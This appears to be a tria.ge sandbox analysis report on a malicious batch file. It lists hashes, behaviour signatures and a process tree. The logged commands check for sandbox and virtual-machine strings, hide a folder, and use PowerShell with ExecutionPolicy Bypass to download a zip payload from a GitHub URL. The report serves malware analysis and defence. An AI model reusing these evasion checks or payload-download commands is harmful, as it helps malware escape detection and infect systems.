Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
120s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
22/01/2025, 17:56
Static task
static1
Behavioral task
behavioral1
Sample
.bat
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
.bat
Resource
win10v2004-20241007-en
General
-
Target
.bat
-
Size
35KB
-
MD5
e0f14d8b4e040e347ac4c68fa65ab34d
-
SHA1
7792151bebcc851456faf92760e66e63fd9db8b8
-
SHA256
7944c6a800e3956afceb244e4b58d6368858879cef8d225c0c870646e29405d5
-
SHA512
cacaaef3f5184ed6a0c2f7655114dabeee7bf5e163d65a1758ba209ceeac97c5d79210fc0c6d1c98ff2ac9c1664ddbbde00f3587af1cc9983d0047a3c3205991
-
SSDEEP
768:x+R8e3f87iaNQeCOarasWNMb5yMqX/9MFRb:+3UdNQAarapE
Malware Config
Signatures
-
pid Process 1692 powershell.exe -
Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh netsh.exe -
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.
pid Process 2580 systeminfo.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1692 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeIncreaseQuotaPrivilege 2836 WMIC.exe Token: SeSecurityPrivilege 2836 WMIC.exe Token: SeTakeOwnershipPrivilege 2836 WMIC.exe Token: SeLoadDriverPrivilege 2836 WMIC.exe Token: SeSystemProfilePrivilege 2836 WMIC.exe Token: SeSystemtimePrivilege 2836 WMIC.exe Token: SeProfSingleProcessPrivilege 2836 WMIC.exe Token: SeIncBasePriorityPrivilege 2836 WMIC.exe Token: SeCreatePagefilePrivilege 2836 WMIC.exe Token: SeBackupPrivilege 2836 WMIC.exe Token: SeRestorePrivilege 2836 WMIC.exe Token: SeShutdownPrivilege 2836 WMIC.exe Token: SeDebugPrivilege 2836 WMIC.exe Token: SeSystemEnvironmentPrivilege 2836 WMIC.exe Token: SeRemoteShutdownPrivilege 2836 WMIC.exe Token: SeUndockPrivilege 2836 WMIC.exe Token: SeManageVolumePrivilege 2836 WMIC.exe Token: 33 2836 WMIC.exe Token: 34 2836 WMIC.exe Token: 35 2836 WMIC.exe Token: SeIncreaseQuotaPrivilege 2836 WMIC.exe Token: SeSecurityPrivilege 2836 WMIC.exe Token: SeTakeOwnershipPrivilege 2836 WMIC.exe Token: SeLoadDriverPrivilege 2836 WMIC.exe Token: SeSystemProfilePrivilege 2836 WMIC.exe Token: SeSystemtimePrivilege 2836 WMIC.exe Token: SeProfSingleProcessPrivilege 2836 WMIC.exe Token: SeIncBasePriorityPrivilege 2836 WMIC.exe Token: SeCreatePagefilePrivilege 2836 WMIC.exe Token: SeBackupPrivilege 2836 WMIC.exe Token: SeRestorePrivilege 2836 WMIC.exe Token: SeShutdownPrivilege 2836 WMIC.exe Token: SeDebugPrivilege 2836 WMIC.exe Token: SeSystemEnvironmentPrivilege 2836 WMIC.exe Token: SeRemoteShutdownPrivilege 2836 WMIC.exe Token: SeUndockPrivilege 2836 WMIC.exe Token: SeManageVolumePrivilege 2836 WMIC.exe Token: 33 2836 WMIC.exe Token: 34 2836 WMIC.exe Token: 35 2836 WMIC.exe Token: SeIncreaseQuotaPrivilege 2964 WMIC.exe Token: SeSecurityPrivilege 2964 WMIC.exe Token: SeTakeOwnershipPrivilege 2964 WMIC.exe Token: SeLoadDriverPrivilege 2964 WMIC.exe Token: SeSystemProfilePrivilege 2964 WMIC.exe Token: SeSystemtimePrivilege 2964 WMIC.exe Token: SeProfSingleProcessPrivilege 2964 WMIC.exe Token: SeIncBasePriorityPrivilege 2964 WMIC.exe Token: SeCreatePagefilePrivilege 2964 WMIC.exe Token: SeBackupPrivilege 2964 WMIC.exe Token: SeRestorePrivilege 2964 WMIC.exe Token: SeShutdownPrivilege 2964 WMIC.exe Token: SeDebugPrivilege 2964 WMIC.exe Token: SeSystemEnvironmentPrivilege 2964 WMIC.exe Token: SeRemoteShutdownPrivilege 2964 WMIC.exe Token: SeUndockPrivilege 2964 WMIC.exe Token: SeManageVolumePrivilege 2964 WMIC.exe Token: 33 2964 WMIC.exe Token: 34 2964 WMIC.exe Token: 35 2964 WMIC.exe Token: SeIncreaseQuotaPrivilege 2964 WMIC.exe Token: SeSecurityPrivilege 2964 WMIC.exe Token: SeTakeOwnershipPrivilege 2964 WMIC.exe Token: SeLoadDriverPrivilege 2964 WMIC.exe -
Suspicious use of WriteProcessMemory 54 IoCs
description pid Process procid_target PID 2708 wrote to memory of 2812 2708 cmd.exe 31 PID 2708 wrote to memory of 2812 2708 cmd.exe 31 PID 2708 wrote to memory of 2812 2708 cmd.exe 31 PID 2812 wrote to memory of 2832 2812 net.exe 32 PID 2812 wrote to memory of 2832 2812 net.exe 32 PID 2812 wrote to memory of 2832 2812 net.exe 32 PID 2708 wrote to memory of 2724 2708 cmd.exe 33 PID 2708 wrote to memory of 2724 2708 cmd.exe 33 PID 2708 wrote to memory of 2724 2708 cmd.exe 33 PID 2724 wrote to memory of 2716 2724 cmd.exe 34 PID 2724 wrote to memory of 2716 2724 cmd.exe 34 PID 2724 wrote to memory of 2716 2724 cmd.exe 34 PID 2708 wrote to memory of 2940 2708 cmd.exe 35 PID 2708 wrote to memory of 2940 2708 cmd.exe 35 PID 2708 wrote to memory of 2940 2708 cmd.exe 35 PID 2708 wrote to memory of 2576 2708 cmd.exe 36 PID 2708 wrote to memory of 2576 2708 cmd.exe 36 PID 2708 wrote to memory of 2576 2708 cmd.exe 36 PID 2708 wrote to memory of 2116 2708 cmd.exe 37 PID 2708 wrote to memory of 2116 2708 cmd.exe 37 PID 2708 wrote to memory of 2116 2708 cmd.exe 37 PID 2708 wrote to memory of 2804 2708 cmd.exe 38 PID 2708 wrote to memory of 2804 2708 cmd.exe 38 PID 2708 wrote to memory of 2804 2708 cmd.exe 38 PID 2708 wrote to memory of 2836 2708 cmd.exe 39 PID 2708 wrote to memory of 2836 2708 cmd.exe 39 PID 2708 wrote to memory of 2836 2708 cmd.exe 39 PID 2708 wrote to memory of 2596 2708 cmd.exe 40 PID 2708 wrote to memory of 2596 2708 cmd.exe 40 PID 2708 wrote to memory of 2596 2708 cmd.exe 40 PID 2708 wrote to memory of 2580 2708 cmd.exe 42 PID 2708 wrote to memory of 2580 2708 cmd.exe 42 PID 2708 wrote to memory of 2580 2708 cmd.exe 42 PID 2708 wrote to memory of 2588 2708 cmd.exe 43 PID 2708 wrote to memory of 2588 2708 cmd.exe 43 PID 2708 wrote to memory of 2588 2708 cmd.exe 43 PID 2708 wrote to memory of 2964 2708 cmd.exe 45 PID 2708 wrote to memory of 2964 2708 cmd.exe 45 PID 2708 wrote to memory of 2964 2708 cmd.exe 45 PID 2708 wrote to memory of 2960 2708 cmd.exe 46 PID 2708 wrote to memory of 2960 2708 cmd.exe 46 PID 2708 wrote to memory of 2960 2708 cmd.exe 46 PID 2708 wrote to memory of 524 2708 cmd.exe 47 PID 2708 wrote to memory of 524 2708 cmd.exe 47 PID 2708 wrote to memory of 524 2708 cmd.exe 47 PID 2708 wrote to memory of 2252 2708 cmd.exe 48 PID 2708 wrote to memory of 2252 2708 cmd.exe 48 PID 2708 wrote to memory of 2252 2708 cmd.exe 48 PID 2708 wrote to memory of 2540 2708 cmd.exe 49 PID 2708 wrote to memory of 2540 2708 cmd.exe 49 PID 2708 wrote to memory of 2540 2708 cmd.exe 49 PID 2708 wrote to memory of 1692 2708 cmd.exe 50 PID 2708 wrote to memory of 1692 2708 cmd.exe 50 PID 2708 wrote to memory of 1692 2708 cmd.exe 50 -
Views/modifies file attributes 1 TTPs 1 IoCs
pid Process 2540 attrib.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2708 -
C:\Windows\system32\net.exenet session2⤵
- Suspicious use of WriteProcessMemory
PID:2812 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 session3⤵PID:2832
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c hostname2⤵
- Suspicious use of WriteProcessMemory
PID:2724 -
C:\Windows\system32\HOSTNAME.EXEhostname3⤵PID:2716
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Khbthjfa "2⤵PID:2940
-
-
C:\Windows\system32\findstr.exefindstr /r /i ".*tria.*\.ge"2⤵PID:2576
-
-
C:\Windows\system32\netsh.exenetsh interface show interface2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:2116
-
-
C:\Windows\system32\findstr.exefindstr /i "Triage"2⤵PID:2804
-
-
C:\Windows\System32\Wbem\WMIC.exewmic computersystem get model2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2836
-
-
C:\Windows\system32\findstr.exefindstr /i "VirtualBox VMware Hyper-V KVM"2⤵PID:2596
-
-
C:\Windows\system32\systeminfo.exesysteminfo2⤵
- Gathers system information
PID:2580
-
-
C:\Windows\system32\findstr.exefindstr /i "VirtualBox VMware Hyper-V"2⤵PID:2588
-
-
C:\Windows\System32\Wbem\WMIC.exewmic bios get serialnumber2⤵
- Suspicious use of AdjustPrivilegeToken
PID:2964
-
-
C:\Windows\system32\findstr.exefindstr /i "VBOX VMWARE"2⤵PID:2960
-
-
C:\Windows\System32\Wbem\WMIC.exewmic nic get name2⤵PID:524
-
-
C:\Windows\system32\findstr.exefindstr /i "Virtual"2⤵PID:2252
-
-
C:\Windows\system32\attrib.exeattrib +h "C:\Users\Admin\AppData\Local\Anon" /s /d2⤵
- Views/modifies file attributes
PID:2540
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ExecutionPolicy Bypass -Command "try { Invoke-WebRequest 'https://github.com/H8bs0lfVZviVo3nSSXLzzzz/ksawdarsffsff/raw/refs/heads/main/jsxbjJkH.zip' -OutFile 'jsxbjJkH.zip' } catch { Write-Error 'Download failed with error: $_'; exit 1 }"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1692
-